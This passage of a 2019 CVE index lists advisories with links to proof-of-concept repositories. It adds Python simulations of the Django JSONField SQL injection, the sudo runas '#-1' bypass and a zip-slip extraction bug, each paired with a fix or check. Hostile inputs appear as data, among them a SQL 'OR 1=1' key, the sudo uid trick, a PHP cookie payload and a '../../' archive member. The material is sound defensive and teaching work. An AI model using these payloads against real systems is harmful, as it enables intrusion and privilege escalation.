Lightning Network Daemon (lnd) before 0.7 allows attackers to trigger loss of funds because of Incorrect Access Control.

- [lightninglabs/chanleakcheck](https://github.com/lightninglabs/chanleakcheck)

### CVE-2019-13000 (2020-01-31)

Eclair through 0.3 allows attackers to trigger loss of funds because of Incorrect Access Control. NOTE: README.md states "it is beta-quality software and don't put too much money in it."

- [ACINQ/detection-tool-cve-2019-13000](https://github.com/ACINQ/detection-tool-cve-2019-13000)

### CVE-2019-13024 (2019-07-01)

Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29 allow an attacker to execute arbitrary system commands: the "init_script" / "Monitoring Engine Binary" value in main.get.php is used to insert an arbitrary command into the database, and the command is executed by calling the vulnerable page www/include/configuration/configGenerate/xml/generateFiles.php, which passes the stored value from the database to shell_exec without sanitizing it.

- [mhaskar/CVE-2019-13024](https://github.com/mhaskar/CVE-2019-13024)
- [get-get-get-get/Centreon-RCE](https://github.com/get-get-get-get/Centreon-RCE)

### CVE-2019-13025 (2019-10-02)

Compal CH7465LG CH7465LG-NCIP-6.12.18.24-5p8-NOSH devices have Incorrect Access Control because of Improper Input Validation. The attacker can send a maliciously modified POST (HTTP) request containing shell commands, which will be executed on the device, to a backend API endpoint of the cable modem.

- [x1tan/CVE-2019-13025](https://github.com/x1tan/CVE-2019-13025)

### CVE-2019-13027 (2019-07-12)

Realization Concerto Critical Chain Planner (aka CCPM) 5.10.8071 has SQL Injection in at least the taskupdt/taskdetails.aspx webpage via the projectname parameter.

- [IckoGZ/CVE-2019-13027](https://github.com/IckoGZ/CVE-2019-13027)

### CVE-2019-13051 (2019-10-09)

Pi-Hole 4.3 allows Command Injection.

- [pr0tean/CVE-2019-13051](https://github.com/pr0tean/CVE-2019-13051)

### CVE-2019-13063 (2019-09-23)

Within Sahi Pro 8.0.0, an attacker can send a specially crafted URL to include any victim files on the system via the script parameter on the Script_view page. This will result in file disclosure (i.e., being able to pull any file from the remote victim application). This can be used to steal and obtain sensitive config and other files. This can result in complete compromise of the application. The script parameter is vulnerable to directory traversal and both local and remote file inclusion.

- [0x6b7966/CVE-2019-13063-POC](https://github.com/0x6b7966/CVE-2019-13063-POC)

### CVE-2019-13086 (2019-06-30)

core/MY_Security.php in CSZ CMS 1.2.2 before 2019-06-20 has member/login/check SQL injection by sending a crafted HTTP User-Agent header and omitting the csrf_csz parameter.

- [lingchuL/CVE_POC_test](https://github.com/lingchuL/CVE_POC_test)

### CVE-2019-13101 (2019-08-08)

An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page.

- [halencarjunior/dlkploit600](https://github.com/halencarjunior/dlkploit600)

### CVE-2019-13115 (2019-07-16)

In libssh2 before 1.9.0, kex_method_diffie_hellman_group_exchange_sha256_key_exchange in kex.c has an integer overflow that could lead to an out-of-bounds read in the way packets are read from the server. A remote attacker who compromises a SSH server may be able to disclose sensitive information or cause a denial of service condition on the client system when a user connects to the server. This is related to an _libssh2_check_length mistake, and is different from the various issues fixed in 1.8.1, such as CVE-2019-3855.

- [viz27/Libssh2-Exploit](https://github.com/viz27/Libssh2-Exploit)
- [CSSProject/libssh2-Exploit](https://github.com/CSSProject/libssh2-Exploit)

### CVE-2019-13143 (2019-08-06)

An HTTP parameter pollution issue was discovered on Shenzhen Dragon Brothers Fingerprint Bluetooth Round Padlock FB50 2.3. With the user ID, user name, and the lock's MAC address, anyone can unbind the existing owner of the lock, and bind themselves instead. This leads to complete takeover of the lock. The user ID, name, and MAC address are trivially obtained from APIs found within the Android or iOS application. With only the MAC address of the lock, any attacker can transfer ownership of the lock from the current user over to the attacker's account, rendering the lock completely inaccessible to the current user.

- [securelayer7/pwnfb50](https://github.com/securelayer7/pwnfb50)

### CVE-2019-13144 (2019-07-05)

myTinyTodo 1.3.3 through 1.4.3 allows CSV Injection. This is fixed in 1.5.

- [cccaaasser/CVE-2019-13144](https://github.com/cccaaasser/CVE-2019-13144)

### CVE-2019-13272 (2019-07-17)

In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit's pkexec helper with PTRACE_TRACEME. NOTE: SELinux deny_ptrace might be a usable workaround in some environments.

- [jas502n/CVE-2019-13272](https://github.com/jas502n/CVE-2019-13272)
- [Cyc1eC/CVE-2019-13272](https://github.com/Cyc1eC/CVE-2019-13272)
- [bigbigliang-malwarebenchmark/cve-2019-13272](https://github.com/bigbigliang-malwarebenchmark/cve-2019-13272)
- [oneoy/CVE-2019-13272](https://github.com/oneoy/CVE-2019-13272)
- [polosec/CVE-2019-13272](https://github.com/polosec/CVE-2019-13272)
- [sumedhaDharmasena/-Kernel-ptrace-c-mishandles-vulnerability-CVE-2019-13272](https://github.com/sumedhaDharmasena/-Kernel-ptrace-c-mishandles-vulnerability-CVE-2019-13272)
- [Tharana/Exploiting-a-Linux-kernel-vulnerability](https://github.com/Tharana/Exploiting-a-Linux-kernel-vulnerability)
- [RashmikaEkanayake/Privilege-Escalation-CVE-2019-13272-](https://github.com/RashmikaEkanayake/Privilege-Escalation-CVE-2019-13272-)
- [Tharana/vulnerability-exploitation](https://github.com/Tharana/vulnerability-exploitation)
- [teddy47/CVE-2019-13272---Documentation](https://github.com/teddy47/CVE-2019-13272---Documentation)
- [datntsec/CVE-2019-13272](https://github.com/datntsec/CVE-2019-13272)
- [jana30116/CVE-2019-13272-Local-Privilege-Escalation](https://github.com/jana30116/CVE-2019-13272-Local-Privilege-Escalation)
- [babyshen/CVE-2019-13272](https://github.com/babyshen/CVE-2019-13272)
- [GgKendall/secureCodingDemo](https://github.com/GgKendall/secureCodingDemo)
- [asepsaepdin/CVE-2019-13272](https://github.com/asepsaepdin/CVE-2019-13272)
- [MDS1GNAL/ptrace_scope-CVE-2019-13272-privilege-escalation](https://github.com/MDS1GNAL/ptrace_scope-CVE-2019-13272-privilege-escalation)
- [josemlwdf/CVE-2019-13272](https://github.com/josemlwdf/CVE-2019-13272)

### CVE-2019-13288 (2019-07-04)

In Xpdf 4.01.01, the Parser::getObj() function in Parser.cc may cause infinite recursion via a crafted file. A remote attacker can leverage this for a DoS attack. This is similar to CVE-2018-16646.

- [gleaming0/CVE-2019-13288](https://github.com/gleaming0/CVE-2019-13288)
- [Fineas/CVE-2019-13288-POC](https://github.com/Fineas/CVE-2019-13288-POC)

### CVE-2019-13292 (2019-07-04)

A SQL Injection issue was discovered in webERP 4.15. Payments.php accepts payment data in base64 format. After this is decoded, it is deserialized. Then, this deserialized data goes directly into a SQL query, with no sanitizing checks.

- [gustanini/CVE-2019-13292-WebERP_4.15](https://github.com/gustanini/CVE-2019-13292-WebERP_4.15)

### CVE-2019-13361 (2019-09-05)

Smanos W100 1.0.0 devices have Insecure Permissions, exploitable by an attacker on the same Wi-Fi network.

- [lodi-g/CVE-2019-13361](https://github.com/lodi-g/CVE-2019-13361)

### CVE-2019-13403 (2019-07-17)

Temenos CWX version 8.9 has a Broken Access Control vulnerability in the module /CWX/Employee/EmployeeEdit2.aspx, leading to the viewing of user information.

- [B3Bo1d/CVE-2019-13403](https://github.com/B3Bo1d/CVE-2019-13403)

### CVE-2019-13404 (2019-07-08)

The MSI installer for Python through 2.7.16 on Windows defaults to the C:\Python27 directory, which makes it easier for local users to deploy Trojan horse code. (This also affects old 3.x releases before 3.5.) NOTE: the vendor's position is that it is the user's responsibility to ensure C:\Python27 access control or choose a different directory, because backwards compatibility requires that C:\Python27 remain the default for 2.7.x.

- [alidnf/CVE-2019-13404](https://github.com/alidnf/CVE-2019-13404)

### CVE-2019-13496 (2019-11-04)

One Identity Cloud Access Manager before 8.1.4 Hotfix 1 allows OTP bypass via vectors involving a man in the middle, the One Identity Defender product, and replacing a failed SAML response with a successful SAML response.

- [FurqanKhan1/CVE-2019-13496](https://github.com/FurqanKhan1/CVE-2019-13496)

### CVE-2019-13497 (2019-11-04)

One Identity Cloud Access Manager before 8.1.4 Hotfix 1 allows CSRF for logout requests.

- [FurqanKhan1/CVE-2019-13497](https://github.com/FurqanKhan1/CVE-2019-13497)

### CVE-2019-13498 (2019-07-29)

One Identity Cloud Access Manager 8.1.3 does not use HTTP Strict Transport Security (HSTS), which may allow man-in-the-middle (MITM) attacks. This issue is fixed in version 8.1.4.

- [FurqanKhan1/CVE-2019-13498](https://github.com/FurqanKhan1/CVE-2019-13498)

### CVE-2019-13574 (2019-07-12)

In lib/mini_magick/image.rb in MiniMagick before 4.9.4, a fetched remote image filename could cause remote command execution because Image.open input is directly passed to Kernel#open, which accepts a '|' character followed by a command.

- [masahiro331/CVE-2019-13574](https://github.com/masahiro331/CVE-2019-13574)

### CVE-2019-13633 (2020-10-19)

Blinger.io v.1.0.2519 is vulnerable to Blind/Persistent XSS. An attacker can send arbitrary JavaScript code via a built-in communication channel, such as Telegram, WhatsApp, Viber, Skype, Facebook, Vkontakte, or Odnoklassniki. This is mishandled within the administration panel for conversations/all, conversations/inbox, conversations/unassigned, and conversations/closed.

- [Security-AVS/CVE-2019-13633](https://github.com/Security-AVS/CVE-2019-13633)

### CVE-2019-13720 (2019-11-25)

Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [cve-2019-13720/cve-2019-13720](https://github.com/cve-2019-13720/cve-2019-13720)
- [ChoKyuWon/CVE-2019-13720](https://github.com/ChoKyuWon/CVE-2019-13720)

### CVE-2019-13764 (2019-12-10)

Type confusion in JavaScript in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [HaboobLab/CVE-2019-13764](https://github.com/HaboobLab/CVE-2019-13764)

### CVE-2019-13956 (2019-07-18)

Discuz!ML 3.2 through 3.4 allows remote attackers to execute arbitrary PHP code via a modified language cookie, as demonstrated by changing 4gH4_0df5_language=en to 4gH4_0df5_language=en'.phpinfo().'; (if the random prefix 4gH4_0df5_ were used).

- [rhbb/CVE-2019-13956](https://github.com/rhbb/CVE-2019-13956)

### CVE-2019-13990 (2019-07-26)

initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description.

- [epicosy/Quartz-1](https://github.com/epicosy/Quartz-1)

### CVE-2019-14040 (2020-02-07)

Using memory after being freed in qsee due to wrong implementation can lead to unexpected behavior such as execution of unknown code in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, MDM9150, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996AU, MSM8998, QCS605, QM215, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM845, SDX20, SDX24, SM8150, SXR1130

- [tamirzb/CVE-2019-14040](https://github.com/tamirzb/CVE-2019-14040)

### CVE-2019-14041 (2020-02-07)

During listener modified response processing, a buffer overrun occurs due to lack of buffer size verification when updating message buffer with physical address information in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8917, MSM8953, MSM8996AU, Nicobar, QCM2150, QCS405, QCS605, QM215, Rennell, SA6155P, Saipan, SC8180X, SDA660, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM632, SDM670, SDM710, SDM845, SDX20, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130

- [tamirzb/CVE-2019-14041](https://github.com/tamirzb/CVE-2019-14041)

### CVE-2019-14079 (2020-03-05)

Access to the uninitialized variable when the driver tries to unmap the dma buffer of a request which was never mapped in the first place leading to kernel failure in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in APQ8009, APQ8053, MDM9607, MDM9640, MSM8909W, MSM8953, QCA6574AU, QCS605, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM632, SDM670, SDM710, SDM845, SDX24, SM8150, SXR1130

- [parallelbeings/CVE-2019-14079](https://github.com/parallelbeings/CVE-2019-14079)

### CVE-2019-14220 (2019-09-24)

An issue was discovered in BlueStacks 4.110 and below on macOS and 4.120 and below on Windows. BlueStacks employs Android running in a virtual machine (VM) to enable Android apps to run on Windows or macOS. The bug is a local arbitrary file read through a system service call. The impacted method runs with system admin privilege and, given a file name as a parameter, returns the content of that file. A malicious app using the affected method can therefore read the content of any system file that it is not authorized to read.

- [seqred-s-a/cve-2019-14220](https://github.com/seqred-s-a/cve-2019-14220)

### CVE-2019-14234 (2019-08-09)

An issue was discovered in Django 1.11.x before 1.11.23, 2.1.x before 2.1.11, and 2.2.x before 2.2.4. Due to an error in shallow key transformation, key and index lookups for django.contrib.postgres.fields.JSONField, and key lookups for django.contrib.postgres.fields.HStoreField, were subject to SQL injection. This could, for example, be exploited via crafted use of "OR 1=1" in a key or index name to return all records, using a suitably crafted dictionary, with dictionary expansion, as the **kwargs passed to the QuerySet.filter() function.

- [malvika-thakur/CVE-2019-14234](https://github.com/malvika-thakur/CVE-2019-14234)
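
The failure mode described above is that the *key name* of a JSONField/HStoreField lookup reached the SQL text while only the *value* was parameterised. The following added example (it is not Django's code and nothing here talks to a database) simulates that shallow key transform, shows the post-fix shape where the key becomes a bound parameter, and adds the application-side allowlist a practitioner should apply before expanding untrusted dictionaries into `QuerySet.filter(**kwargs)`. The field names `data` and `attrs` and the `KEY_LOOKUP_FIELDS` table are hypothetical.

```python
import re

# Hypothetical model for the illustration: a JSONField named "data" and an
# HStoreField named "attrs", both queried with the PostgreSQL "->" key operator.
KEY_LOOKUP_FIELDS = {"data": "->", "attrs": "->"}
SAFE_KEY = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def vulnerable_key_sql(lookup: str) -> str:
    """Simulation (not Django's code) of the pre-fix shallow key transform: for a
    kwarg such as data__color the key is spliced into the SQL text as a literal."""
    field, _, key = lookup.partition("__")
    op = KEY_LOOKUP_FIELDS[field]  # unknown field: KeyError, as the ORM would also refuse it
    return f'("{field}" {op} \'{key}\')'


def vulnerable_where(filter_kwargs: dict):
    """Build a WHERE clause the way the shallow transform did: the values are
    parameterised (%s), the key names are not."""
    clauses, params = [], []
    for lookup, value in filter_kwargs.items():
        clauses.append(f"{vulnerable_key_sql(lookup)} = %s")
        params.append(value)
    return " AND ".join(clauses), params


def fixed_key_sql(lookup: str):
    """Post-fix shape: the key is handed to the driver as a bound parameter, so
    quotes or 'OR 1=1' inside it are data, never SQL."""
    field, _, key = lookup.partition("__")
    op = KEY_LOOKUP_FIELDS[field]
    return f'("{field}" {op} %s)', [key]


def safe_filter_kwargs(untrusted: dict) -> dict:
    """Application-side allowlist: only known fields, and only keys that are an
    identifier or a non-negative integer index, may reach filter(**kwargs).
    This is defence in depth even on a patched Django."""
    cleaned = {}
    for lookup, value in untrusted.items():
        field, sep, key = lookup.partition("__")
        if not sep or field not in KEY_LOOKUP_FIELDS:
            raise ValueError(f"unexpected lookup: {lookup!r}")
        if not (key.isdigit() or SAFE_KEY.fullmatch(key)):
            raise ValueError(f"illegal key name in lookup: {lookup!r}")
        cleaned[lookup] = value
    return cleaned


if __name__ == "__main__":
    # Constructed attacker-controlled query-string dictionary.
    hostile = {"data__color') = 'x' OR 1=1 --": "red"}
    print(vulnerable_where(hostile))
    print(fixed_key_sql(next(iter(hostile))))
    try:
        safe_filter_kwargs(hostile)
    except ValueError as exc:
        print("rejected:", exc)
```

The vulnerable builder turns the hostile key into `("data" -> 'color') = 'x' OR 1=1 --') = %s`, which is the "return all records" outcome the advisory describes; the allowlist rejects the same input before it reaches the ORM.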

### CVE-2019-14267 (2019-07-29)

PDFResurrect 0.15 has a buffer overflow via a crafted PDF file because data associated with startxref and %%EOF is mishandled.

- [snappyJack/pdfresurrect_CVE-2019-14267](https://github.com/snappyJack/pdfresurrect_CVE-2019-14267)

### CVE-2019-14271 (2019-07-29)

In Docker 19.03.x before 19.03.1 linked against the GNU C Library (aka glibc), code injection can occur when the nsswitch facility dynamically loads a library inside a chroot that contains the contents of the container.

- [iridium-soda/CVE-2019-14271_Exploit](https://github.com/iridium-soda/CVE-2019-14271_Exploit)

### CVE-2019-14287 (2019-10-17)

In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.

- [FauxFaux/sudo-cve-2019-14287](https://github.com/FauxFaux/sudo-cve-2019-14287)
- [CashWilliams/CVE-2019-14287-demo](https://github.com/CashWilliams/CVE-2019-14287-demo)
- [n0w4n/CVE-2019-14287](https://github.com/n0w4n/CVE-2019-14287)
- [gurneesh/CVE-2019-14287-write-up](https://github.com/gurneesh/CVE-2019-14287-write-up)
- [shallvhack/Sudo-Security-Bypass-CVE-2019-14287](https://github.com/shallvhack/Sudo-Security-Bypass-CVE-2019-14287)
- [huang919/cve-2019-14287-PPT](https://github.com/huang919/cve-2019-14287-PPT)
- [wenyu1999/sudo-](https://github.com/wenyu1999/sudo-)
- [Sindadziy/cve-2019-14287](https://github.com/Sindadziy/cve-2019-14287)
- [Sindayifu/CVE-2019-14287-CVE-2014-6271](https://github.com/Sindayifu/CVE-2019-14287-CVE-2014-6271)
- [CMNatic/Dockerized-CVE-2019-14287](https://github.com/CMNatic/Dockerized-CVE-2019-14287)
- [axax002/sudo-vulnerability-CVE-2019-14287](https://github.com/axax002/sudo-vulnerability-CVE-2019-14287)
- [SachinthaDeSilva-cmd/Exploit-CVE-2019-14287](https://github.com/SachinthaDeSilva-cmd/Exploit-CVE-2019-14287)
- [HussyCool/CVE-2019-14287-IT18030372-](https://github.com/HussyCool/CVE-2019-14287-IT18030372-)
- [ShianTrish/sudo-Security-Bypass-vulnerability-CVE-2019-14287](https://github.com/ShianTrish/sudo-Security-Bypass-vulnerability-CVE-2019-14287)
- [ejlevin99/Sudo-Security-Bypass-Vulnerability](https://github.com/ejlevin99/Sudo-Security-Bypass-Vulnerability)
- [thinuri99/Sudo-Security-Bypass-Vulnerability-CVE-2019-14287-](https://github.com/thinuri99/Sudo-Security-Bypass-Vulnerability-CVE-2019-14287-)
- [janod313/-CVE-2019-14287-SUDO-bypass-vulnerability](https://github.com/janod313/-CVE-2019-14287-SUDO-bypass-vulnerability)
- [DewmiApsara/CVE-2019-14287](https://github.com/DewmiApsara/CVE-2019-14287)
- [M108Falcon/Sudo-CVE-2019-14287](https://github.com/M108Falcon/Sudo-CVE-2019-14287)
- [edsonjt81/CVE-2019-14287-](https://github.com/edsonjt81/CVE-2019-14287-)
- [DularaAnushka/Linux-Privilege-Escalation-using-Sudo-Rights](https://github.com/DularaAnushka/Linux-Privilege-Escalation-using-Sudo-Rights)
- [h3xcr4ck3r/CVE-2019-14287](https://github.com/h3xcr4ck3r/CVE-2019-14287)
- [Hasintha-98/Sudo-Vulnerability-Exploit-CVE-2019-14287](https://github.com/Hasintha-98/Sudo-Vulnerability-Exploit-CVE-2019-14287)
- [MariliaMeira/CVE-2019-14287](https://github.com/MariliaMeira/CVE-2019-14287)
- [Ijinleife/CVE-2019-14287](https://github.com/Ijinleife/CVE-2019-14287)
- [lemonadern/poc-cve-2019-14287](https://github.com/lemonadern/poc-cve-2019-14287)
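
The mechanism behind the `-u \#$((0xffffffff))` invocation above is a sign/width mismatch: user ID -1 truncates to `(uid_t)-1`, which is not 0 and so passes an `!root` blacklist, but `setresuid()` treats that value as "leave unchanged", and sudo is already root at that point. The added Python model below (it is not sudo's code, and assumes a 32-bit `uid_t` and a rule of the form `(ALL, !root) ALL`) makes that arithmetic concrete, contrasts it with the 1.8.28 behaviour, and includes a version-triage helper for the first line of `sudo --version`.

```python
import re

UID_MAX = 0xFFFFFFFF   # (uid_t)-1 on Linux; setresuid() treats it as "do not change this id"
FIXED_IN = (1, 8, 28)  # per the advisory: Sudo before 1.8.28 is affected


def parse_runas_uid(spec: str) -> int:
    """Parse sudo's numeric runas form ('#<id>') and truncate it to an unsigned
    32-bit uid_t the way the C conversion would (assumption: 32-bit uid_t)."""
    if not spec.startswith("#"):
        raise ValueError("expected a numeric runas spec such as '#1000'")
    return int(spec[1:], 0) & UID_MAX


def vulnerable_runas_uid(spec: str) -> int:
    """Model (not sudo's code) of pre-1.8.28 behaviour under '(ALL, !root) ALL'.
    Returns the uid the command actually ends up running as."""
    uid = parse_runas_uid(spec)
    if uid == 0:
        raise PermissionError("runas root is denied by !root")
    # sudo is still uid 0 when it calls setresuid(uid, uid, uid); for (uid_t)-1
    # the kernel changes nothing, so the command keeps uid 0.
    return 0 if uid == UID_MAX else uid


def fixed_runas_uid(spec: str) -> int:
    """1.8.28 behaviour: -1 / 4294967295 is rejected as an invalid user id
    before any policy check or privilege switch."""
    uid = parse_runas_uid(spec)
    if uid == UID_MAX:
        raise PermissionError("unknown user id")
    if uid == 0:
        raise PermissionError("runas root is denied by !root")
    return uid


def sudo_version_vulnerable(version_line: str) -> bool:
    """Triage helper for e.g. 'Sudo version 1.8.27p1' (first line of `sudo --version`)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", version_line)
    if not m:
        raise ValueError(f"no version number found in {version_line!r}")
    return tuple(int(x) for x in m.groups()) < FIXED_IN


if __name__ == "__main__":
    for spec in ("#-1", "#4294967295", "#1000"):
        print(spec, "->", parse_runas_uid(spec), "runs as uid", vulnerable_runas_uid(spec))
    print("1.8.27 vulnerable:", sudo_version_vulnerable("Sudo version 1.8.27"))
```

Both `#-1` and `#4294967295` collapse to the same `uid_t` value, which is why the write-ups above show either form. The version check is only a first pass: distributions backport fixes without bumping the upstream version, so confirm against the vendor's package changelog.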

### CVE-2019-14314 (2019-08-27)

A SQL injection vulnerability exists in the Imagely NextGEN Gallery plugin before 3.2.11 for WordPress. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected system via modules/nextgen_gallery_display/package.module.nextgen_gallery_display.php.

- [imthoe/CVE-2019-14314](https://github.com/imthoe/CVE-2019-14314)

### CVE-2019-14319 (2019-09-04)

The TikTok (formerly Musical.ly) application 12.2.0 for Android and iOS performs unencrypted transmission of images, videos, and likes. This allows an attacker to extract private sensitive information by sniffing network traffic.

- [MelroyB/CVE-2019-14319](https://github.com/MelroyB/CVE-2019-14319)

### CVE-2019-14322 (2019-07-28)

In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames.

- [faisalfs10x/CVE-2019-14322-scanner](https://github.com/faisalfs10x/CVE-2019-14322-scanner)
- [faisalfs10x/http-vuln-cve2019-14322.nse](https://github.com/faisalfs10x/http-vuln-cve2019-14322.nse)
- [sergiovks/CVE-2019-14322](https://github.com/sergiovks/CVE-2019-14322)

### CVE-2019-14326 (2020-04-14)

An issue was discovered in AndyOS Andy versions up to 46.11.113. By default, it starts telnet and ssh (ports 22 and 23) with root privileges in the emulated Android system. This can be exploited by remote attackers to gain full access to the device, or by malicious apps installed inside the emulator to perform privilege escalation from a normal user to root (unlike with standard methods of getting root privileges on Android - e.g., the SuperSu program - the user is not asked for consent). There is no authentication performed - access to a root shell is given upon a successful connection. NOTE: although this was originally published with a slightly different CVE ID number, the correct ID for this Andy vulnerability has always been CVE-2019-14326.

- [seqred-s-a/cve-2019-14326](https://github.com/seqred-s-a/cve-2019-14326)

### CVE-2019-14339 (2019-09-05)

The ContentProvider in the Canon PRINT jp.co.canon.bsd.ad.pixmaprint 2.5.5 application for Android does not properly restrict canon.ij.printer.capability.data data access. This allows an attacker's malicious application to obtain sensitive information including factory passwords for the administrator web interface and WPA2-PSK key.

- [0x48piraj/CVE-2019-14339](https://github.com/0x48piraj/CVE-2019-14339)

### CVE-2019-14439 (2019-07-30)

A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9.2. This occurs when Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the logback jar in the classpath.

- [jas502n/CVE-2019-14439](https://github.com/jas502n/CVE-2019-14439)

### CVE-2019-14450 (2019-10-28)

A directory traversal vulnerability was discovered in RepetierServer.exe in Repetier-Server 0.8 through 0.91 that allows for the creation of a user controlled XML file at an unintended location. When this is combined with CVE-2019-14451, an attacker can upload an "external command" configuration as a printer configuration, and achieve remote code execution. After exploitation, loading of the external command configuration is dependent on a system reboot or service restart.

- [securifera/CVE-2019-14450](https://github.com/securifera/CVE-2019-14450)

### CVE-2019-14514 (2020-02-10)

An issue was discovered in Microvirt MEmu all versions prior to 7.0.2. A guest Android operating system inside the MEmu emulator contains a /system/bin/systemd binary that is run with root privileges on startup (this is unrelated to Red Hat's systemd init program, and is a closed-source proprietary tool that seems to be developed by Microvirt). This program opens TCP port 21509, presumably to receive installation-related commands from the host OS. Because everything after the installer:uninstall command is concatenated directly into a system() call, it is possible to execute arbitrary commands by supplying shell metacharacters.

- [seqred-s-a/cve-2019-14514](https://github.com/seqred-s-a/cve-2019-14514)

### CVE-2019-14529 (2019-08-02)

OpenEMR before 5.0.2 allows SQL Injection in interface/forms/eye_mag/save.php.

- [Wezery/CVE-2019-14529](https://github.com/Wezery/CVE-2019-14529)

### CVE-2019-14530 (2019-08-13)

An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from the server.

- [Wezery/CVE-2019-14530](https://github.com/Wezery/CVE-2019-14530)
- [sec-it/exploit-CVE-2019-14530](https://github.com/sec-it/exploit-CVE-2019-14530)

### CVE-2019-14537 (2019-08-07)

YOURLS through 1.7.3 is affected by a type juggling vulnerability in the api component that can result in login bypass.

- [Wocanilo/CVE-2019-14537](https://github.com/Wocanilo/CVE-2019-14537)

### CVE-2019-14540 (2019-09-15)

A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariConfig.

- [LeadroyaL/cve-2019-14540-exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)

### CVE-2019-14615 (2020-01-17)

Insufficient control flow in certain data structures for some Intel(R) Processors with Intel(R) Processor Graphics may allow an unauthenticated user to potentially enable information disclosure via local access.

- [HE-Wenjian/iGPU-Leak](https://github.com/HE-Wenjian/iGPU-Leak)

### CVE-2019-14678 (2019-11-14)

SAS XML Mapper 9.45 has an XML External Entity (XXE) vulnerability that can be leveraged by malicious attackers in multiple ways. Examples are Local File Reading, Out Of Band File Exfiltration, Server Side Request Forgery, and/or Potential Denial of Service attacks. This vulnerability also affects the XMLV2 LIBNAME engine when the AUTOMAP option is used.

- [mbadanoiu/CVE-2019-14678](https://github.com/mbadanoiu/CVE-2019-14678)

### CVE-2019-14745 (2019-08-07)

In radare2 before 3.7.0, a command injection vulnerability exists in bin_symbols() in libr/core/cbin.c. By using a crafted executable file, it's possible to execute arbitrary shell commands with the permissions of the victim. This vulnerability is due to improper handling of symbol names embedded in executables.

- [xooxo/CVE-2019-14745](https://github.com/xooxo/CVE-2019-14745)

### CVE-2019-14751 (2019-08-22)

NLTK Downloader before 3.4.5 is vulnerable to a directory traversal, allowing attackers to write arbitrary files via a ../ (dot dot slash) in an NLTK package (ZIP archive) that is mishandled during extraction.

- [mssalvatore/CVE-2019-14751_PoC](https://github.com/mssalvatore/CVE-2019-14751_PoC)
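
The archive-extraction bug above is the classic "zip slip": a member name carrying `../` is joined onto the destination directory and written wherever it lands. `zipfile.ZipFile.extract()` sanitises names itself, but a hand-rolled loop that joins and writes (which is what an extraction routine needs to do to report progress) does not. The added example below is not NLTK's code; it builds a constructed package in memory, runs the unsafe loop and a containment-checked one in a scratch directory, and reports what happened.

```python
import io
import os
import tempfile
import zipfile


def build_malicious_package() -> bytes:
    """Constructed sample: a package ZIP with one benign member and one member
    whose name climbs two levels out of the extraction directory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("corpus/readme.txt", "benign data file\n")
        zf.writestr("../../escaped.txt", "written outside the download dir\n")
    return buf.getvalue()


def vulnerable_extract(data: bytes, dest: str) -> list:
    """Hand-rolled loop that trusts member names: join, mkdir, write."""
    written = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            target = os.path.join(dest, info.filename)  # no containment check
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.realpath(target))
    return written


def safe_extract(data: bytes, dest: str) -> list:
    """Resolve every member path first and refuse the whole archive if any one
    of them leaves dest; only then write, so a bad archive leaves nothing behind."""
    dest_real = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        targets = []
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
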